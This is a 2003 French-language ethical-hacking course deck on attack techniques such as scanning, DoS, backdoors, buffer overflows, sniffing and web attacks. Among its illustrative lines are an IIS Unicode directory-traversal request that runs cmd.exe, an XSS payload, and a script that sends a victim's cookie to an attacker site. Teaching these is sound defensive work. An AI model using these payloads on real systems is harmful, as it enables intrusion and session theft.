Sécurité contre l’intrusion informatique partie 1 Sylvain Maret / version 1 Mars 2003
Agenda Introduction à la sécurité informatique Ethical Hacking Les outils de sécurité Firewalls IDS Introduction à PKI Architecture PKI Sytème d’authentification
Introduction Deux grands axes Les attaques Les outils à disposition Le cours n’est pas exhaustif Chaque sujet est une spécialité Tous les jours des nouvelles techniques Ethical Hacking Connaître les méthodes pour mieux se défendre Aucun nom de programmes de hacking « destructif »
Programme du cours: volume 1 Définition de la sécurité informatique Estimation du risque Les menaces Les vulnérabilités CVE Evolution dans le temps
Programme du cours: volume 1 Obtention d’informations Scanners Social Engineering Virus, Trojan, Backdoor D0S, DDoS SMTP Compromission Système BoF Sniffer Web Wireless Etc.
Programme du cours: volume 2 Les outils de sécurité Firewall IDS Systèmes d’authentification PKI Proxy Honeypot, Honeynet VPN Etc.
La sécurité informatique ? Protection du système d’informations les biens de l’entreprise Une démarche globale Engagement de la direction de l’entreprise Classification des biens Estimation des risques Définition d’une politique de sécurité Mise en oeuvre de la politique de sécurité Une démarche constante
Définition: système d’informations Organisation des activités consistant à acquérir, stocker, transformer, diffuser, exploiter, gérer … les informations Un des moyens pour faire fonctioner un système d’information est l’utilisation d’un  système informatique
Exemple de biens informatiques Le système de production Industrie, Banques Les informations financières Les informations commerciales Le système de commerce électronique Les bases de données Les brevets, inventions Etc.
Les objectifs de sécurité Diminution des risques (tendre vers zéro…) Mettre en œuvre les moyens pour préserver: La confidentialité L’intégrité L’authentification L’autorisation La non-répudation La disponibilité
Estimation du risque Risque = Coûts * Menaces * Vulnérabilités $
Les coûts d’une attaque ? Déni de services (perte de productivité) Perte ou altération des données Vol d’informations sensibles Destruction des systèmes Compromission des systèmes Atteinte à l’image de l’entreprise Etc.
Les menaces: communauté « Black Hat » ou « Hackers » Source: CERT 2002
Les menaces: tendances Les « Black Hat » sont de mieux en mieux organisés Sites Web Conférences Attaques sur Internet sont faciles et difficilement identifiables (peu de traces) Outils d’intrusion sont très évolués et faciles d’accès
Sources d’informations Sites Internet Conférences Black Hat Defcon Etc. Journaux IRC, Chat Publications Ecoles de « hacking » Etc.
Leurs motivations ? Le profit et l’argent Avantage compétitif Espionnage Vengeance Revendication Curiosité Gloire Etc.
Evolution des attaques Source: CERT 2001
Pyramide des menaces Source: RBC Capital Market
Les vulnérabilités Augmentation significative des vulnérabilités Pas de « design » pensé sécurité Complexité du système d’information Besoins Marketing (Software) Evolution très (trop) rapide des technologies Etc. Le maillon faible est l’humain…
Augmentation des vulnérabilités Environ 80 nouvelles vulnérabilités par semaine  en 2002 Et 2003 ? Source: CERT octobre 2002
Incidents reportés par le CERT Environ 1’800 incidents par semaine en 2002 Et 2003 ? Source: CERT octobre 2002
CVE: Common Vulnerabilities and Exposures Définition commune d’une vulnérabilité De facto standard pour les constructeurs Processus de validation par le CVE 1er phase: canditature    CAN-2002-xxx 2ème phase: acceptation ?    CVE-2002-xxx Source: CVE 2002
CVE: une nouvelle vulnérabilité PHP Source: CVE 2002
CVE: produits de sécurité Source: CVE 2002
Evolution des entrées CVE Source: CVE 2002 Sep-99 Oct-99 Nov-99 Dec-99 Jan-00 Feb-00 Mar-00 Apr-00 May-00 Jun-00 Jul-00 Aug-00 Sep-00 Oct-00 Nov-00 Dec-00 Jan-01 Feb-01 Mar-01 Apr-01 May-01 Jun-01 Jul-01 Aug-01 Sep-01 Oct-01 Nov-01 Dec-01 Jan-02 Feb-02 Mar-02 Apr-02 May-02 Jun-02 0 500 1000 1500 2000 2500 3000 3500 4000 4500 5000 Candidates CVE Entries
Vulnérabilités: Top 20  Source: CERT octobre 2002
Les tendances: les firewalls ne sont plus suffisants ! Attaques des applications 70 % des attaques http (Gartner 2002) B0F: 60% des problèmes  (CERT 2002) 3 sites Web sur 4 sont vulnérables (Gartner 2002)
Influence du temps ? La sécurité est un processus permanent Et non un produit… L’idée: Maintenir en permanence les vulnérabilités au plus bas Suivre les recommandations des constructeurs (patchs, update, etc.) Amélioration de l’architecture de sécurité Evaluation des systèmes Audit Tests d’intrusions
Evolution des risques dans le temps ? Risque Temps Risques acceptés aujourd’hui Risques de demain
Cycle d’une vulnérabilité Time Gap Source: CERT  2002
Evolution dans le temps Time Ideal Gap Growing Gap Source: CERT 2002
Peut-on prévenir les intrusions ? Source: CERT  2002
L’idée: diminuer le risque et maintenir cette démarche Risque initial Risque accepté
Quel montant faut il investir ? Risque Coûts Risques acceptés
Les attaques
Obtention d’informations La première phase avant une attaque Obtention d’informations passives Recherche par le Web (google) NIC, Ripe Whois Sam Spade Registre du commerce Etc.                                               
Recherche du nom de domaine
Obtention d’informations des « Domain Name Server » Obtention d’informations techniques DNS MX Record Zone transfert (si possible) Etc. Les Outils DIG Nslookup Host Etc.
Exemple: recherche des entrées de messagerie (MX Record)
Exemple: essais d’un « zone transfer »
Exemple: essais d’un « zone transfer » Transfert interdit
Les scanners: identification à distance des systèmes Technique d’identification des systèmes et des applications Processus d’obtention d’informations (information gathering) Phase d’approche préalable à une attaque Facteur déterminant lors d’une attaque Objectif: identifier de manière précise le type de système pour mieux cibler son attaque En déduire ses vulnérabilités
Types de scanners Scanner de ports ou services Scanner de type « OS Fingerprint » Scanner de vulnérabilitées Scanner générique Scanner de type « WEB Scanner » Scanner de base de données SQL server Oracle Etc.
Scanner de ports Objectif: cartographier de manière précise les services offert par une machine ou un réseau de machines Serveur Web Server DNS Messagerie Serveur FTP Server Real Service Microsoft Service SSH IPSEC Firewall Etc.
Scanner de ports Scan de ports TCP et UDP voir ICMP Option de scan: Scan ouvert (Vanilla TCP Scan) Scan demi-ouvert Scan furtif Scan très lent Etc. L’idée: ne pas se faire détecter par un IDS Scanner est un art !
Scan ouvert (Standard TCP Connect) Source: Matta Security 2002
Scan demi-ouvert (Half-Open Syn Scan) Source: Matta Security 2002
Scan Furtif (Hosts Unix) Source: Matta Security 2002
UDP Scan Source: Matta Security 2002
Scanner de ports pour Windows Cible Attaquant 0-n
Scanner de ports: NMAP pour Unix
« OS Fingerprint » ou prise d’empreinte Objectif: détermininer de manière précise le type de système d’exploitation et de service Win2k, Solaris 2.7, IOS 11.x, Red Hat, Mac, etc. Apache 2.x, Sendmail 8.x, IIS v5, Checkpoint, etc. Approche passive et active L’idée: ne pas se faire détecter par un IDS
« OS Fingerprint »: illustration
« OS Fingerprint »: les techniques Source Intranode 2001
« OS Fingerprint »: analyse de banière Source Intranode 2001
« OS Fingerprint »: analyse de banière
« OS Fingerprint »: intérogation TCP/IP Source Intranode 2001
« OS Fingerprint »: les outils Nmap Queso XProbe2 Ring HMAP (Web Serveurs) Smtpscan Etc.
Scanner de vulnérabilités Deux grandes familles Product Based Solution Service Based Solution Updates automatique Signatures de vulnérabilités Généralement compatible CVE Certains produits disponibles en Open Source
Scanner de vulnérabilités Outils très complets (mais généraliste) Services WEB FTP, DNS, SNMP, etc. NetBios (Microsoft) SSH Servers RPC D0S Database Mail Etc.
Scanner de vulnérabilités: Nessus
Scanner mode ASP Tests d’intrusions réalisés par un centre de tests d’intrusions Les tests sont réalisés à la demande ou de façon automatique Le résultat est consultable, en ligne, par un navigateur Web Les cibles à tester sont principalement des services frontaux (Internet, Extranet)
Exemple: scanner mode ASP Source: Qualys 2002
Web Scanner Outils de tests d’intrusions pour les services Web Outils très spécialisés Tests très poussés au niveau des applications CGI Cookies Unicode B0F BackDoor Hiden Field Brute force XSS, CSS Etc.
Déni de services: DoS ou DDoS Atteinte au bon fonctionnement d’un système Immobilisation ou « gel » Utilisation massive des ressources CPU Utilisation massive de la bande passante Crash du système Voir perte de données
Déni de services: DoS ou DDoS 4 grandes familles Les « destructeurs » de système Les Floodings Les « dévoreurs » de bande passante ou ressources CPU Les Mails Bombs
Les destructeurs de système Attaques qui « crash » les systèmes Pratiquement invisible Exploitent les vulnérabilités des systèmes d’exploitation ou des applications Beaucoup de problèmes avec Windows NT Attaques de type Ping of death Teardrop Land Targa Etc.
Exemple: destruction d’un système Source:  Gibson Research Corparation 2002
Exemple d’outils D0S pour Microsoft
Flooding Litéralement: « l’inondation » d’un système Attaques de type  Syn-Flood Log-Flood Data-Flood
Attaque Syn-Flood Exploitation du mécanisme d’établissement d’une connexion TCP Immobilisation du système Peut dans certains cas « crasher » le système Pratiquement anonyme Spoofing d’adresse IP source
Initialisation d’une connexion TCP en trois phases Source:  Gibson Research Corparation 2002
Attaque de type Syn-Flood Source:  Gibson Research Corparation 2002
Exemple: Syn-Flood Source:  Gibson Research Corparation 2002
Les dévoreurs de ressources Utilisation massive de la bande passante ou des ressources CPU La plus connue est Smurf
Exemple: Smurf Source:  Gibson Research Corparation 2002
Distributed Denial of Service (DDoS) Amplification des attaques D0S Attaques très dangereuses Peut impliquer jusqu’à un millier de machines attaquantes Outils Open Source
DDoS: fonctionnement de base Source:  Gibson Research Corparation 2002
Exemple: DDoS Source:  Gibson Research Corparation 2002
Les Mails Bombs Programmes qui envoient des mails en quantité massive Mails obscènes Mails en quantité énormes Abonnement à des mailling lists Fichiers attachés gigantesques Etc. Très difficile à stopper Très difficile à tracer Relais de messagerie anonyme
Exemple: mail bomber…
Social Engineering « The weakest link in the chain is the people » Kevin Mitnik
Social Engineering Technique dans le but d’0btenir des informations confidentielles pour préparer une attaque Utilisation du téléphone Utilisation de l’ e-mail Utilisation d’un fax ou du courier Vol de documents, photos, vol de matériels, etc Manipulation psychologique Etc.
Social Engineering: la messagerie Source: Hacknet 2002
Social Engineering: le petit cadeau…
Les virus Une des plus grande menace pour les entreprises Pus de 90 % des entreprises ont subi des attaques virales Le temps de propagation est de plus en plus rapide ! Coût moyen d’une attaque: 105’000 .- CHF Environ 20 jours / homme de travail Source: ICSA 2001
Evolution du nombre de virus F-Secure Septembre 2001
Virus: définition Un virus est un programme qui se réplique en s’attachant à un autre objet Un ver (Worm) est un programme qui se réplique de façon indépendante
Anatomie d’un virus Une routine de réplication Cette partie est obligatoire pour être un virus Autrement il s’agit d’un « Malware » Une routine de type « payload » Partie optionnelle qui effectue une action Destruction, Vol d’information, etc. Affichage d’une image ou vidéo, etc. Son Etc.
Différents types de virus Boot sector viruses Traditional files viruses Document et macro viruses 32 bits files viruses Worms (mail worm / pure worm) Malware Cheval de Troie Backdoor Spyware Etc.
Cheval de Troie ou trojan Définition: Un programme légitime qui exécute des actions indésirables Ne se réplique pas Fait partie de la famille des virus au sens large du terme Aussi connu sous le nom de « PESTS » Exemple: un jeux qui installe un key logger Le moyen de transport est souvent la messagerie ou un site web Une fois executé, il installe: Un Malware, Spyware Une Back Door Etc.
Evolution des « PESTS » Source: PestPatrol 2001
Backdoor Programme malicieux permettant le contrôle total d’une machine Fonctionalités Capture écran, clavier, caméra, carte son Transfert de fichiers Capture des mots de passe Registry Exécution de programme Pop up Sniffer, connexion réseau Support de Plug-In Etc.
Backdoor classique: mode de connexion Source: SensePost 2002
Backdoor classique: firewall Source: SensePost 2002
Backdoor évoluée Source: SensePost 2002
Un réseau « typique » Source: SensePost 2002
Backdoor: utilisation de IE (http/ https) Source: SensePost 2002
Key logger Famille des « Malware » ou « SpyWare » Permet d’enregistrer toutes les touches du clavier Envoie des informations par: Mail FTP HTTP Etc. Invisible sur la machine pour un utilisateur « standard » Disponible en logiciel commercial…
Exemple de Key Logger
Evolution des virus: 1988-2002 Source: F-Secure 2001
Messagerie SMTP Remote SMTP Server Detection Attaque basée sur une vulnérabilité (DoS, BoF, Root exploit, etc.) Relais de messagerie Usurpation d’identité Spoofing de mail Protocole SMTP Protocole non sécurisé Atteinte à l’intégrité des messages Atteinte à la confidentialité des messages Spam (mail bomber, publicité, etc.)
Atteinte à la confidentialité: exemple avec une Backdoor Personne A Personne B SMTP Serveur de  messagerie Black Hat Backdoor invisible POP3
Atteinte à l’intégrité: exemple avec une attaque sur les DNS Hacker Changement des  MX Record Mail Modification  du mail
Compromission système L’idée est de prendre le contrôle complet de la machine au niveau de son système d’exploitation Les cibles sont des machines mal configurées ou/et non « patchées » Microsoft Unix / Linux etc.
Compromission système L’accès permet: Examiner des informations confidentielles Altérer ou détruire des données Utiliser des ressources systèmes Ecouter le traffic sur le réseau local Effectuer des DoS Lancer des attaques vers d’autres systèmes
Compromission système: scénario classique d’attaque Source: CERT 2001
Compromission système Après la compromission du système: Effacement des fichiers de « logs » Inspection de la machine FIA, etc Installation d’une « Back Door » Installation d’un « Root Kit » Installation de logiciels d’attaques Outils d’attaques « ARP  » Un sniffer de mot de passe Un scanner Etc.
Root Kit Kit de programmes pour dissimuler les traces sur une machine et garder le contrôle de la machine (Root) Environnement Unix et Microsoft Root Kit Unix Remplacement des  commandes: ls, ps, netstat, top, su, tcpd, ssh, etc. Cacher certains fichiers Backdoor Root Kit Microsoft Cache certains processsus Cache certains fichiers Cache certaines « Registries » Backdoor
Root Kit: les deux familles Application Root Kit Root Kit conventionnel Remplacement des commandes Programme avec Backdoor Kernel Root Kit Manipulation des « Call System » Très difficile à détecter
Root Kit: compromission d’autres systèmes
Buffer Overflow
Buffer Overflow: une menace très importante B0F 60% des attaques (CERT 2002) Très puissant Exécution de code hostile (très souvent avec privilèges) Exploit local ou distant Extrêmement facile à utiliser Tools pour « Script Kidies » (Exploit) Code Red et Nimda en 2001 B0F on ISAPI
Buffer Overflow: pourquoi existent ils ? Mauvaise programmation Gestion des pointeurs Manipulation des « buffers » Peu de contrôle du code (QA) Pas de tests des BoF Pas de validation des « buffers » Limitation du nombre de caractères Pas de design pensé sécurité Trop chère et trop lent
Buffer Overflow: objectif Forcer l’exécution d’un code hostile dans le but de: D’obtenir un accès Root ou équivalent Exécuter un D0S D’installer une backdoor De corrompre une machine Etc. Pas de limite: dépend du code hostile et de l’imagination de son auteur
Buffer Overflow: démonstration Source: Entercept 2002
Buffer Overflow: démonstration Source: Entercept 2002
Buffer Overflow: démonstration Source: Entercept 2002
Buffer Overflow: démonstration Here is the “Call” instruction that tells the OS to jump to our SayHello subroutine Source: Entercept 2002
Buffer Overflow: démonstration This is where the program SHOULD return after executing SayHello: 0040D734 Source: Entercept 2002
Buffer Overflow: démonstration The return address (00 40 D7 34) is now pushed onto the stack. Intel architectures are little-endian, so the address appears reversed:  34 D7 40 00 Source: Entercept 2002
Buffer Overflow: démonstration The debugger has cleared the stack frame for us by filling it with CC bytes Source: Entercept 2002
Buffer Overflow: démonstration Now the strcpy() function is called. The data supplied is copied into the buffer. Source: Entercept 2002
Buffer Overflow: démonstration Source: Entercept 2002
Buffer Overflow: démonstration Source: Entercept 2002
Buffer Overflow: démonstration Note the valid return address bytes: 34 D7 40 00 Source: Entercept 2002
Buffer Overflow: démonstration When strcpy() is called, the malicious data is copied into the buffer and overflows it, overwriting the return address. The bytes of the return address are now 35 39 34 35. Source: Entercept 2002
Buffer Overflow: démonstration Ou  exécution d’un code hostile Source: Entercept 2002
Buffer Overflow: How to be Root ! Code hostile
Découverte des mots de passe Les approches Attaque par dictionnaire Basée sur des fichiers de mots de passe Fichiers générique Fichiers thématiques Attaque par « brute force » Essai de toutes les combinaisons Attaque hybride Dictionnaire et « brute force »
Découverte des mots de passe: techniques Obtention du fichier des mots de passe /etc/passwd - /etc/shadows (Unix) Fichier Sam Microsoft Etc. Capture à l’aide d’un renifleur Microsoft NT 4.0 (NTLM) Telnet, FTP, ldap, etc. Attaques par connexion Serveur Telnet, FTP, POP3, HTTP, etc Routeurs, Switchs, Appliance Main Frame ERP Etc.
Exemple de recherche de mots de passe
Exemple avec Windows 2000 (Kerberos)
Exemple avec Windows 2000 (Kerberos)
Les renifleurs (Sniffer) Outils de capture du trafic réseau Utilisent la carte réseau en mode « promiscuous » Les « Black Hat » les utilisent pour: Examiner le traffic entre plusieurs machines Capturer les mots de passe Examiner les emails Etc. La plupart des applications sont en « claires » Telnet, FTP, POP3, ldap, http, rlogin, etc. Un renifleur est pratiquement indétectable !
Exemple de sniffer Unix: dsniff
Les renifleurs (Sniffer): environnements « Switché » Il est possible de renifler dans un environnement switché Techniques utilisées MAC Attacks ARP Attacks Etc. Source: Cisco 2002
MAC Attacks MAC Flooding Corruption des tables CAM Agit comme un HUB Utilisation d’un sniffer Outils disponible sur Internet ! macof Source: Cisco 2002
ARP attack: ARP Spoofing Corruption des tables ARP à l’aide d’outils ARP n’offre pas de mécanisme de sécurité ! Méthode très simple Outils les plus connus Dsniff by Dug Song Ettercap Hunt Arp-sk Etc.
Renifleur dans un environement « switché » Réseau « switché » Serveur Cible Client Cible Attaque ARP Attaque ARP Flux Client-Serveur telnet Flux Client-Serveur telnet Routage Renifleur
Détournement de session: Hijacking Man in the Midle Serveur Cible Client Cible SSH, Telnet, SSL, etc.
Détournement de session: protocoles sécurisés Session SSL Session SSH Attention, ces messages ne sont pas anodins !
Application Web Application Web: application sofware qui est accessible à l’aide un navigateur en utilisant http et/ou https (ou un « user agent » Si le service est TCP 80 ou TCP 443, il s’agit probablement d’une application Web Application très sensible Mauvaise configuration Vulnérabilité Bugs Etc. Nouvelle cible des "Black Hat" !
Application Web: architecture Source: WhiteHat Security 2002
Application Web: la futilité du firewall Source: WhiteHat Security 2002
Application Web: SSL sécurise mon site Web Source: WhiteHat Security 2002
Application Web: les principales attaques Vulnérabilités des serveurs Web IIS, Apache, I-Planet, etc. Exécution de programme Buffer Overflow Back Door Escalade de privilèges SQL Cross Site Scripting Défiguration (Defacement) Etc.
Pourquoi la sécurité « classique » n’est plus suffisante ? Les applications Web sont vulnérables Env. 80% des applications testées (FoundStone) Les développeurs ne sont pas encore sensibilisés à la sécurité informatique Encore trop d’erreurs Les hackers se focalisent sur les applications Web Votre firewall classique est impuissant pour prévenir les intrusions applicatives Vos sondes IDS peuvent « éventuellement » détecter une attaque !
Votre firewall – votre meilleur ennemi http / https Html, Dhtml XML, Soap, WSDL .NET Java, ActiveX, VBScript, etc. * Pour les flux HTTP votre firewall  =  * Firewall Classique filtrage niveau 3
Les différentes attaques des applications Web HTTP / HTTPS Port 80 / 443 Client Web Serveur Web Apache IIS Iplanet Zeus Etc. App. Web XML, Soap, HTML, etc. XML DB  DB  Application Server CGI, PHP Etc. RMI IIOP XML Soap etc. SQL XML JDBC etc. Injection de code SQL Dénis de service Etc. Mauvais contrôle  des entrées utilisateur Méta caractères BoF Etc. Interprétation des URLs Mauvaise configuration BoF Unicode Direct OS Command Etc. Vol de session MiM http MiM SSL Sniffing Cross Site Scripting Code mobile
Interprétation des URLs HTTP Port 80 Client Web Firewall  Classique Serveur Web Apache IIS Iplanet Zeus Etc. App. Web XML, Soap, HTML, etc. XML DB  DB  Application Server CGI, PHP Etc. RMI IIOP XML Soap etc. SQL XML JDBC etc. http:// fantasio.e-xpertsolutions.com: 80 /chemin/ application.asp ? a=toto&b=1234
Illustration avec IIS Unicode Exploit Ancienne vulnérabilité du serveur IIS Exemple pédagogique Permet d’exécuter des commandes sur le serveur IIS Utilise les URL malformés pour « passer les commandes » « Dot Dot » Unicode
Interprétation de commandes par les URLs Serveur Web Fantasio GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
Contrôle des données utilisateurs La plupart des applications ne contrôlent pas les  « Input » Seulement un contrôle au niveau du client (navigateur) ! Les attaques possibles Insertion de code, XSS BoF (pas de contrôle de taille) exécution de code malicieux Dépassement des quotas (transaction financière) Caractères dangereux: ! @ $ % ^ & * ( ) - _ + ` ~ \ | [ ] { } ; : ' &quot; ? / , . > <
Illustration avec le Cross-Site Scripting (XSS) Principe de l’attaque Attaquer les utilisateurs de l’application plutôt que l’application elle-même L’attaquant peut provoquer l’envoi à la victime par le site Web légitime d’une page hostile contenant des scripts ou des composants malveillants Cette page est exécutée sur le poste de la victime dans le contexte du site Web d’origine <A HREF=http://www.mabanque.com/<script>  alert(‘Malicious code’) </script>&quot;>Click Here</a>
Exemple: vol d’un cookie <script> document.location=‘http://hackers.ch/cgi/cookie?’+document.cookie </script> Envoie du cookie vers le site hackers.ch
Exemple: Vol de session par XSS Lien hostile Mail, Page Web Application Web Application utilisateur Web Exécution de code hostile CGI Script 1 Hacker Login avec le cookie volé 2 3 4 5
Projet «  Open Web Application Security Project (OWASP)  » http://www.owasp.org Publication top 10 des vulnérabilités
Defacement ou graffiti Web
Application Web: défiguration Définition: changement des pages Web Applications Web sont des cibles très visibles  Les &quot;Black Hat&quot; utilisent ces ressources pour: Revendications Fun Vengeance Etc. Partie visible de l’iceberg En pleine croissance… http://www.attrition.org http://www.zone-h.org/en/defacements
Defacements: évolution dans le temps
Exemple de défiguration politique: « Egyptian Fighter » Source: www.alldas.org Août 2002
Techniques de défiguration Changement des pages « Web » FTP Compromission du serveur Etc. DNS redirection ou « poisoning » Piratage de domaine Corruption des « proxy caches » Etc.
Microsoft IIS Beaucoup de failles de sécurité Top One (CERT) 60% des défigurations Année 2001 ISAPI Buffer overflow (exécution de commande) Code Red IIS Directory Traversal (Unicode) « HTTP Request » malformées Installation backdoor, voir les fichiers, etc. « Sample Code » Code Red et Nimda 13 Juillet 2001 et 18 septembre 2001
Microsoft IIS Octobre 2001: Gartner Group recommande de trouver une alternative à IIS… Microsoft promet une nouvelle version IIS ?
Réseaux Wireless Grande popularité du réseau sans fils Coûts abordables Confort d’utilisation La contre partie Gros problèmes de sécurité Concerne les protocoles 802.11x (a, b et g) 802.11x défini une couche de protection: WEP = Wired Equivalent Privacy Encryption rc4 Intégrité avec un CRC32
Réseaux Wireless: l’architecture classique Source: NIST 2002
Réseaux Wireless: le problème Environ 70% des entreprise n’utilisent pas le WEP « Complexité » Performance WEP est très vulnérable Difficultés d’implémentation Possible de « cracker » les clés en peu de temps Rayonnement très important Possibilité de se connecter à distance (dans la rue par exemple)
Réseaux Wireless: les attaques et les outils Attaques passives Ecoute du trafic à distance (crypté ou pas) Attaques actives Usurpation d’une station Vol de session Modification de trafic DoS Etc. Les outils Un scanner 802.11x Un logiciel de Crackage WEP Un renifleur Etc.
Réseaux Wireless: le Warchalking Interception des réseaux Wireless depuis la rue Marquage des sites à l’aide de symbole Partage de l’information sur les sites Internet Coordonées GPS Etc.
Réseaux Wireless: le Warchalking et ces symboles de base
DNS: rappel
DNS: les attaques Zone transfert Attaque de type Cache Poisoning Changement des MX Record Changement des adresses IP Etc. Vulnérabilités de type « Remote Root » Dépend de la version du « Bind » Processus DNS « tournant » Root Compromission du système DNS
Autres attaques informatiques Méthodes d’encapsulation UDP, TCP, ICMP L’art de passer des informations dans des protocoles « friendly » Recherche des clés privées en mémoire Technique de « Key Grab » Serveurs Web SSL, Messagerie S/Mime, PGP, etc. Attaques sur la technologie PKI Changement des « Trusts » Etc.
Autres attaques informatiques Attaques sur les smartcards, tokens USB Technologie USB Renifleur USB Attaques sur réseaux Microsoft Netbios (share) « Null Session Connection » SNMP Attaques routeurs, switchs Et bien d’autres encore…
Questions ?
e-Xpert Solutions SA Intégrateur en sécurité informatique Au bénéfice d'une longue expérience dans les secteurs financiers et industriels, e-Xpert Solutions SA propose à sa clientèle des solutions « clé en main » dans le domaine de la sécurité informatique des réseaux et des applications. Des solutions qui vont de la sécurité d e périmètre  – tel le firewall, VPN, IDS, FIA, le contrôle de contenu, l’anti-virus – aux solutions plus avant-gardistes comme la prévention des intrusions (approche comportementale), l'authentification forte, la biométrie, les architectures PKI ou encore la sécurisation des OS Unix ,  Microsoft et des postes clients (firewall personnel).
Pour plus d’informations e-Xpert Solutions SA Route de Pré-Marais 29 CH-1233 Bernex / Genève +41 22 727 05 55 [email_address]

Contenu connexe

PPT
Securite informatique
PPT
Attaques Informatiques
PDF
Ch_1 - Généralités sur la sécurité informatique.pdf
PDF
Cours sécurité 2_asr
PDF
Sécurité informatique - Etat des menaces
PDF
Sécurité des réseaux
PPTX
La sécurité informatique
PDF
Gestion des vulnérabilités dans l'IoT
Securite informatique
Attaques Informatiques
Ch_1 - Généralités sur la sécurité informatique.pdf
Cours sécurité 2_asr
Sécurité informatique - Etat des menaces
Sécurité des réseaux
La sécurité informatique
Gestion des vulnérabilités dans l'IoT

Tendances (20)

PDF
Comprendre la securite web
PPTX
Sécurité des systèmes d'informations
PPTX
Sécurité Réseau à Base d'un Firewall Matériel (fortigate)
PPTX
La Sécurité informatiques
PPT
Audit et sécurité des systèmes d'information
PDF
ETUDE ET MISE EN PLACE D’UNE SOLUTION DE GESTION DE LA SECURITE DU RESEAU : C...
PDF
projet sur le vpn presentation
PDF
Alphorm.com Formation Analyse de Malware 1/2 : Le guide complet
PPTX
Les Vpn
PDF
Rapport PFE ingénieur réseaux marwen SAADAOUI ( Juin 2018 )
PDF
sécurité informatique
PDF
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...
PDF
Principes fondamentaux de la sécurité du réseau.
PPTX
Sécurité informatique
PPTX
Sécuriter informatiques
PPTX
INITIATION A LA SÉCURITÉ INFORMATIQUE.pptx
DOCX
Rapport mise en place d'un sevrer VPN .
PDF
Introduction à la sécurité informatique
PPT
Cours CyberSécurité - Concepts Clés
PPTX
Les attaques
Comprendre la securite web
Sécurité des systèmes d'informations
Sécurité Réseau à Base d'un Firewall Matériel (fortigate)
La Sécurité informatiques
Audit et sécurité des systèmes d'information
ETUDE ET MISE EN PLACE D’UNE SOLUTION DE GESTION DE LA SECURITE DU RESEAU : C...
projet sur le vpn presentation
Alphorm.com Formation Analyse de Malware 1/2 : Le guide complet
Les Vpn
Rapport PFE ingénieur réseaux marwen SAADAOUI ( Juin 2018 )
sécurité informatique
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...
Principes fondamentaux de la sécurité du réseau.
Sécurité informatique
Sécuriter informatiques
INITIATION A LA SÉCURITÉ INFORMATIQUE.pptx
Rapport mise en place d'un sevrer VPN .
Introduction à la sécurité informatique
Cours CyberSécurité - Concepts Clés
Les attaques
Publicité

Similaire à Introduction à La Sécurité Informatique 1/2 (20)

PDF
Intervention de Cybersécurité en BTS SIO
PPT
Sécurités & Annuaires
PPTX
ASFWS 2011 - L’importance du protocole HTTP dans la menace APT
PPT
Introduction à La Sécurité Informatique 2/2
PPT
Authentification Forte Cours UNI 2002
PDF
Alphorm.com Formation Analyse de Malware 2/2 : Le guide complet
PDF
siris1.pdf
PDF
Parlons Sécurité IT avec Access et Ludovic Peny (Sophos)
PPTX
Présentation ransomware - Ivanti Interchange 2017
PPT
Protection de son informatique personnelle
PPT
La_sécurité_des_systèmes_d-_information.ppt
PPT
La_sécurité_des_systèmes_d-_information.ppt
PPTX
Barcamp presentation Cybersecurite by saphia
PPTX
Windows 10 - Nouvelles menaces et nouvelles réponses
PPTX
Presenetstion sur Architecture des Ordinateur
PDF
Attaques DDoS par Bruno Tréguier
PDF
PPTX
securisation inormatiquepourlaformation.pptx
PDF
Alphorm.com Formation CEHV9 III
PPTX
Securité des applications web
Intervention de Cybersécurité en BTS SIO
Sécurités & Annuaires
ASFWS 2011 - L’importance du protocole HTTP dans la menace APT
Introduction à La Sécurité Informatique 2/2
Authentification Forte Cours UNI 2002
Alphorm.com Formation Analyse de Malware 2/2 : Le guide complet
siris1.pdf
Parlons Sécurité IT avec Access et Ludovic Peny (Sophos)
Présentation ransomware - Ivanti Interchange 2017
Protection de son informatique personnelle
La_sécurité_des_systèmes_d-_information.ppt
La_sécurité_des_systèmes_d-_information.ppt
Barcamp presentation Cybersecurite by saphia
Windows 10 - Nouvelles menaces et nouvelles réponses
Presenetstion sur Architecture des Ordinateur
Attaques DDoS par Bruno Tréguier
securisation inormatiquepourlaformation.pptx
Alphorm.com Formation CEHV9 III
Securité des applications web
Publicité

Plus de Sylvain Maret (20)

PDF
Air Navigation Service Providers - Unsecurity on Voice over IP Radion
PDF
factsheet_4g_critical_comm_en_vl
PDF
INA Volume 1/3 Version 1.02 Released / Digital Identity and Authentication
PDF
INA Volume 1/3 Version 1.0 Released / Digital Identity and Authentication
PDF
INA Volume 1/3 Version 1.0 RC / Digital Identity and Authentication
PDF
Securite des Web Services (SOAP vs REST) / OWASP Geneva dec. 2012
PDF
Strong Authentication State of the Art 2012 / Sarajevo CSO
PDF
ASFWS 2012 / Initiation à la sécurité des Web Services par Sylvain Maret
PDF
Threat Modeling / iPad
PDF
Strong Authentication in Web Application #SCS III
PDF
Strong Authentication in Web Applications: State of the Art 2011
PDF
Strong Authentication in Web Application / ConFoo.ca 2011
PPT
Authentication and strong authentication for Web Application
PDF
Geneva Application Security Forum 2010
PDF
Final conclusions of Working Group 3 at Workshop Münchenwiler 20-21 of May 20...
PPTX
Comment protéger de façon efficace son/ses identité(s) numérique(s) sur le We...
PPTX
Digital identity trust & confidence
PDF
Implementation of a Biometric Solution Providing Strong Authentication To Gai...
PDF
Geneva Application Security Forum: Vers une authentification plus forte dans ...
PDF
Geneva Application Security Forum: Vers une authentification plus forte dans ...
Air Navigation Service Providers - Unsecurity on Voice over IP Radion
factsheet_4g_critical_comm_en_vl
INA Volume 1/3 Version 1.02 Released / Digital Identity and Authentication
INA Volume 1/3 Version 1.0 Released / Digital Identity and Authentication
INA Volume 1/3 Version 1.0 RC / Digital Identity and Authentication
Securite des Web Services (SOAP vs REST) / OWASP Geneva dec. 2012
Strong Authentication State of the Art 2012 / Sarajevo CSO
ASFWS 2012 / Initiation à la sécurité des Web Services par Sylvain Maret
Threat Modeling / iPad
Strong Authentication in Web Application #SCS III
Strong Authentication in Web Applications: State of the Art 2011
Strong Authentication in Web Application / ConFoo.ca 2011
Authentication and strong authentication for Web Application
Geneva Application Security Forum 2010
Final conclusions of Working Group 3 at Workshop Münchenwiler 20-21 of May 20...
Comment protéger de façon efficace son/ses identité(s) numérique(s) sur le We...
Digital identity trust & confidence
Implementation of a Biometric Solution Providing Strong Authentication To Gai...
Geneva Application Security Forum: Vers une authentification plus forte dans ...
